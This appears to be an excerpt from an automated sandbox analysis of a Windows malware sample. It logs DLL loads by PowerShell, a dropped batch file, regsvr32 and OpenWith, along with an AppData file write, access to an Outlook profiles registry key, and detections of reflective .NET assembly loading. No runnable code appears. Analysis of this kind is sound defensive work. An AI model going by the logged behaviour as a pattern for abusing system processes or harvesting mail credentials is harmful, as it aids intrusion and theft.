Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Users\Public\ajbs50ul.bat Section loaded: userenv.dll
Source: C:\Users\Public\ajbs50ul.bat Section loaded: windows.storage.dll
Source: C:\Users\Public\ajbs50ul.bat Section loaded: wldp.dll
Source: C:\Users\Public\ajbs50ul.bat Section loaded: profapi.dll
Source: C:\Users\Public\ajbs50ul.bat Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: amsi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: wldp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: userenv.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: profapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dataexchange.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: d3d11.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dcomp.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dxgi.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: twinapi.appcore.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: quartz.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: mmdevapi.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: devobj.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: dsound.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: ksuser.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: avrt.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: qedit.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: audioses.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: devenum.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msdmo.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: msacm32.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: midimap.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wudfplatform.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Section loaded: mswsock.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsadu.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: mpr.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: netutils.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: userenv.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: vaultcli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: credui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: feclient.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: msimg32.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: winmm.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: wldp.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsadu.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: mpr.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: netutils.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: userenv.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: vaultcli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: credui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: feclient.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: wldp.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: profapi.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: amsi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: wldp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: userenv.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: profapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: secur32.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: schannel.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptnet.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: webio.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sxs.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: devenum.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: winmm.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: devobj.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: msdmo.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\Public\ajbs50ul.bat File written: C:\Users\user\AppData\Roaming\4smg.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook
Source: Binary string: kernel32.pdbUGP source: regsvr32.exe, 00000007.00000003.1500277385.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500391126.000000001C780000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1510388367.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdbUGP source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500890614.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1512321032.000001BD87B10000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000007.00000003.1499112510.000000001C8B0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1497909811.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000007.00000003.1499112510.000000001C8B0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1497909811.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernel32.pdb source: regsvr32.exe, 00000007.00000003.1500277385.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500391126.000000001C780000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 0000000B.00000003.1510388367.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdbsAlarms^ source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880C7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbPX6 source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880C7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880EF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdb source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500890614.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 0000000B.00000003.1512321032.000001BD87B10000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Source: 7.2.regsvr32.exe.13129ac0.3.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 7.2.regsvr32.exe.13129ac0.3.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 7.3.regsvr32.exe.2d84fa0.6.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 7.3.regsvr32.exe.2d84fa0.6.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 7.2.regsvr32.exe.2d84fa0.0.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 7.2.regsvr32.exe.2d84fa0.0.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 7.3.regsvr32.exe.2d84fa0.7.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 7.3.regsvr32.exe.2d84fa0.7.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 7.2.regsvr32.exe.1b880000.4.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 7.2.regsvr32.exe.1b880000.4.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.10.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.10.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.8.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.8.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.32.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.32.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.47.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.47.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.40.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.40.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.37.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.37.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.43.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.43.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.20.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.20.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.24.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.24.raw.unpack, Runtime.cs .Net Code: CoreMain
